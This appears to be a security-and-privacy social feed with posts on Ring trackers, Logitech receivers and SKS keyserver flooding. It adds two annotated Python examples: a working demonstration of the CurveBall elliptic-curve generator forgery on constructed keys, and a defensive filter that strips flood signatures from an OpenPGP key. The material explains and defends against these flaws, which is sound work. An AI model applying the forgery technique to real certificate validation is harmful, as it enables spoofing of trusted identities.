@krypteia

Lawyers and techies working on pro bono privacy projects in our spare time.

"My problem with contact tracing apps is that they have absolutely no value. I'm not even talking about the privacy concerns, I mean the efficacy. Does anybody think this will do something useful? ... This is just something governments want to do for the hell of it. To me, it's just techies doing techie things because they don't know what else to do." - Bruce Schneier

https://www.schneier.com/blog/archives/2020/05/me_on_covad-19_.html

Me on COVID-19 Contact Tracing Apps - Schneier on Security


BREAKING: We’ve confirmed that the Ring doorbell app on Android covertly shares personally identifiable information on its users with third-party companies, including Facebook.

https://www.eff.org/deeplinks/2020/01/ring-doorbell-app-packed-third-party-trackers

Ring Doorbell App Packed with Third-Party Trackers

Ring isn't just a product that allows users to surveil their neighbors. The company also uses it to surveil its customers. An investigation by EFF of the Ring doorbell app for Android found it to be packed with third-party trackers sending out a plethora of customers' personally identifiable...


Windows #curveball cryptographic engine vulnerability is pretty hilarious. Apparently Windows allowed ECC security certs to specify the elliptic curve parameters used to validate the cert. So you could trivially create certs that would validate against trusted root certs (if those root certs were using ECC).

The fact the NSA disclosed the vulnerability (instead of keeping it) is probably a good indication that they're already able to trivially make certs that validate against the root store.
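An added example, not part of the original post and not Microsoft's code, showing the arithmetic that the post is describing for CurveBall (CVE-2020-0601) in pure Python on P-256. A trusted root publishes Q = d*G for a private key d the attacker never learns. If the verifier accepts the certificate's own explicit curve parameters and matches it to the root by Q alone, the attacker picks any private key d', declares G' = d'^-1 * Q (mod N) as the "generator", and then d' * G' == Q: the forged key pair carries the root's public key and the attacker can sign with d'. The "legitimate" private key is a constructed stand-in, and the two matches_trusted_root_* functions are illustrative models of the vulnerable and corrected comparison, not Windows code. Requires Python 3.8+ for pow(x, -1, m).

```python
# NIST P-256 (secp256r1) domain parameters: y^2 = x^3 + A*x + B over GF(P),
# base point G of prime order N.
P = 2**256 - 2**224 + 2**192 + 2**96 - 1
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)


def on_curve(pt):
    """True if the affine point satisfies the curve equation (None = infinity)."""
    if pt is None:
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def ec_add(p1, p2):
    """Affine point addition on P-256; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                                   # p1 == -p2
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P)  # tangent slope
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P)         # chord slope
    lam %= P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication k*pt."""
    result, addend = None, pt
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result


def forge_generator(root_pub, attacker_priv):
    """Return G' = attacker_priv^-1 * root_pub, so that attacker_priv * G' == root_pub."""
    return ec_mul(pow(attacker_priv, -1, N), root_pub)


def matches_trusted_root_vulnerable(cert_pub, root_pub):
    """Model of the pre-patch check: explicit curve parameters are taken from the
    certificate, so the match against the root is made on the public key alone."""
    return cert_pub == root_pub


def matches_trusted_root_fixed(cert_pub, cert_generator, root_pub, root_generator):
    """Model of the corrected check: the curve (here its generator) must match too."""
    return cert_pub == root_pub and cert_generator == root_generator


# Constructed values for the demonstration (not real keys).
LEGIT_PRIV = 0x1F3A9C8E7D6B5A4938271605F4E3D2C1B0A99887766554433221100FFEEDDCC  # CA key, unknown to attacker
ROOT_PUB = ec_mul(LEGIT_PRIV, G)                 # Q, what the trusted root certificate publishes
ATTACKER_PRIV = 0x2B7E151628AED2A6ABF7158809CF4F3C762E7160F38B4DA56A784D9045190CFE
FORGED_G = forge_generator(ROOT_PUB, ATTACKER_PRIV)

if __name__ == "__main__":
    print("forged generator on curve:", on_curve(FORGED_G))
    print("attacker_priv * G' == root Q:", ec_mul(ATTACKER_PRIV, FORGED_G) == ROOT_PUB)
    print("vulnerable matcher accepts forged key:", matches_trusted_root_vulnerable(ROOT_PUB, ROOT_PUB))
    print("fixed matcher accepts forged key:", matches_trusted_root_fixed(ROOT_PUB, FORGED_G, ROOT_PUB, G))
```

The forged generator is a perfectly valid point on the same curve, which is why an on-curve check alone does not catch it; the defence is refusing explicit parameters (or insisting they equal the named curve's) before comparing public keys.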

Cryptographic Attacks: A Guide for the Perplexed - Check Point Research

Research by: Ben Herzog. Introduction: When some people hear "Cryptography", they think of their Wifi password, of the little green lock icon next to the address of their favorite website, and of the difficulty they'd face trying to snoop in other people's email. Others may recall the litany of vulnerabilities of recent years that boasted a...

If you've got a #Logitech wireless keyboard or mouse, then you should really update the receiver firmware. Turns out those things are just as insecure as you thought and keystroke interception/injection can open the door to absolute pwnage (especially for bank/corporate networks where getting proximity is easy).

https://support.logi.com/hc/en-us/community/posts/360033207154-Logitech-Unifying-Receiver-Update

#Security #Vulnerability #Netsec

Logitech Unifying Receiver Update

New firmware available A firmware update for the Unifying technology USB receiver was released on the 28th August, 2019. This addresses the reported 'Encryption Key Extraction Through USB' vulnera...

So, I couldn't stop thinking about the SKS keyserver pool thing...

I decided the only way to clear my head, would be to write up my mitigation idea and submit it to the SKS-Devel mailing list.

https://lists.nongnu.org/archive/html/sks-devel/2019-07/msg00013.html

I am now looking forward to being told exactly how wrong I am. 😬

[Sks-devel] Keyserver flooding attack: mitigation straw-man

IMO the simplest long term solution is just to drop attestation certificate support altogether. All people really need is access to the public key and any revocation certs.

Confidence in a public key is better established by having the owner post it over multiple independent official channels (e.g. official website, official social media account, keybase, etc).

Attestation has gone from benign but useless part of #OpenPGP, to malignant.

#PGP #GPG #Security #Privacy

A "new" attack on SKS Keyservers can basically kill GPG. Turns out that spamming a target cert with ~150,000 attestation (signature) certificates will cause GPG to grind to a halt on any system with the targeted cert installed when doing any operation with the targeted cert.

SKS Key Servers either don't have protections in place to prevent this spam, or sync with servers that don't.

https://gist.github.com/rjhansen/67ab921ffb4084c865b3618d6955275f

SKS Keyserver Network Under Attack

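An added example serving both the post above on the SKS flooding attack and the "just drop attestation" post before it; it is written for this page and is not code from GnuPG, SKS or the mailing-list proposal. It is a packet-level filter that keeps a key's own packets and the signatures issued by the primary key itself (self-certifications, subkey bindings, revocations) and drops every third-party certification, which is the import-side version of the idea that only the public key and the owner's own signatures matter. It parses RFC 4880 packet framing and issuer subpackets and verifies nothing. The flooded key it runs on is constructed inside the script: random bytes stand in for key material and the spam signatures carry random issuer IDs, so it runs offline.

```python
# Packet-level "self-sigs-only" filter for an OpenPGP public key block.
# Added example (not GnuPG/SKS code): parses RFC 4880 framing and issuer
# subpackets only; it verifies no signatures. The sample key is constructed.
import hashlib
import os

SIG, PUBKEY, USERID = 2, 6, 13          # packet tags used here
SUB_ISSUER, SUB_ISSUER_FPR = 16, 33     # signature subpacket types

def encode_len(n):
    """New-format length octets (RFC 4880 4.2.2), no partial bodies."""
    if n < 192:
        return bytes([n])
    if n < 8384:
        n -= 192
        return bytes([192 + (n >> 8), n & 0xFF])
    return b"\xff" + n.to_bytes(4, "big")

def read_len(buf, i, subpacket=False):
    """Inverse of encode_len: (length, index just past the length octets).
    Subpacket lengths use the 2-octet form for first octets 192..254."""
    first = buf[i]
    if first < 192:
        return first, i + 1
    if first < 224 or (subpacket and first < 255):
        return ((first - 192) << 8) + buf[i + 1] + 192, i + 2
    if first == 255:
        return int.from_bytes(buf[i + 1:i + 5], "big"), i + 5
    raise ValueError("partial body lengths not supported")

def packet(tag, body):
    return bytes([0xC0 | tag]) + encode_len(len(body)) + body

def parse_packets(buf):
    """Yield (tag, body) for every packet; accepts old- and new-format headers."""
    i = 0
    while i < len(buf):
        ctb = buf[i]
        if not ctb & 0x80:
            raise ValueError("not a packet header")
        if ctb & 0x40:                               # new format: 6-bit tag
            tag = ctb & 0x3F
            n, i = read_len(buf, i + 1)
        else:                                        # old format: 4-bit tag + length type
            tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
            if ltype == 3:
                raise ValueError("indeterminate length not supported")
            size = (1, 2, 4)[ltype]
            n = int.from_bytes(buf[i + 1:i + 1 + size], "big")
            i += 1 + size
        yield tag, buf[i:i + n]
        i += n

def v4_key_id(key_body):
    """Low 64 bits of the v4 fingerprint SHA-1(0x99 || len || body)."""
    return hashlib.sha1(b"\x99" + len(key_body).to_bytes(2, "big") + key_body).digest()[-8:]

def parse_subpackets(buf):
    i = 0
    while i < len(buf):
        n, i = read_len(buf, i, subpacket=True)
        yield buf[i], buf[i + 1:i + n]               # (type, data)
        i += n

def signature_issuer(sig_body):
    """Issuer key ID from a v4 signature's hashed or unhashed subpackets."""
    if sig_body[0] != 4:
        return None
    hlen = int.from_bytes(sig_body[4:6], "big")
    ulen = int.from_bytes(sig_body[6 + hlen:8 + hlen], "big")
    for area in (sig_body[6:6 + hlen], sig_body[8 + hlen:8 + hlen + ulen]):
        for typ, data in parse_subpackets(area):
            if typ == SUB_ISSUER and len(data) == 8:
                return bytes(data)
            if typ == SUB_ISSUER_FPR and len(data) == 21 and data[0] == 4:
                return bytes(data[-8:])
    return None

def strip_third_party_sigs(keyblock):
    """Keep every packet except signatures not issued by the primary key.
    Returns (cleaned_block, kept_sigs, dropped_sigs); output uses new-format headers."""
    out, kept, dropped, primary = [], 0, 0, None
    for tag, body in parse_packets(keyblock):
        if tag == PUBKEY and primary is None:
            primary = v4_key_id(body)
        if tag == SIG:
            if signature_issuer(body) != primary:
                dropped += 1
                continue
            kept += 1
        out.append(packet(tag, body))
    return b"".join(out), kept, dropped

def make_sig(issuer_id, sigtype=0x10):
    """Constructed v4 certification: issuer subpacket only, dummy hash prefix and MPI."""
    sub = encode_len(9) + bytes([SUB_ISSUER]) + issuer_id
    body = bytes([4, sigtype, 19, 8]) + b"\x00\x00" + len(sub).to_bytes(2, "big") + sub
    return packet(SIG, body + b"\x00\x00\x00\x08\xab")

def build_flooded_key(n_spam):
    """Constructed key block: v4 primary key (random stand-in key material), one
    user ID, one self-certification, then n_spam certifications from random issuers."""
    key_body = bytes([4, 0, 0, 0, 0, 19]) + os.urandom(80)
    block = packet(PUBKEY, key_body) + packet(USERID, b"Example <example@example.invalid>")
    block += make_sig(v4_key_id(key_body), 0x13)
    for _ in range(n_spam):
        block += make_sig(os.urandom(8))
    return block

if __name__ == "__main__":
    flooded = build_flooded_key(150_000)
    cleaned, kept, dropped = strip_third_party_sigs(flooded)
    print(f"{len(flooded)} -> {len(cleaned)} bytes; kept {kept} self-sig(s), dropped {dropped}")
```

Filtering at import time is the cheap half of the mitigation: the flooded certificate is still fetched in full from the keyserver, so it limits what ends up in the local keyring rather than the download.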

Game of Thrones season 8 should be officially rated as 3.6 Roentgen, because fanbois will insist it was "not great, but not terrible" through willful self-deception, while the rest of us recognize that the f'n core exploded.

#gameofthrones #chernobyl #tv

Seems that @hexatomium (Twitter handle) has come up with a handy little MITM Checker. Basically the program connects to a list of the top 100 sites and notes any suspicious certs in the handshakes.

Discussion thread:

https://www.wilderssecurity.com/threads/mitm-checker.416844/

MITM Checker

Use MITM Checker to determine if your system is currently under a MITM attack. The program will connect to a list of major websites and alert...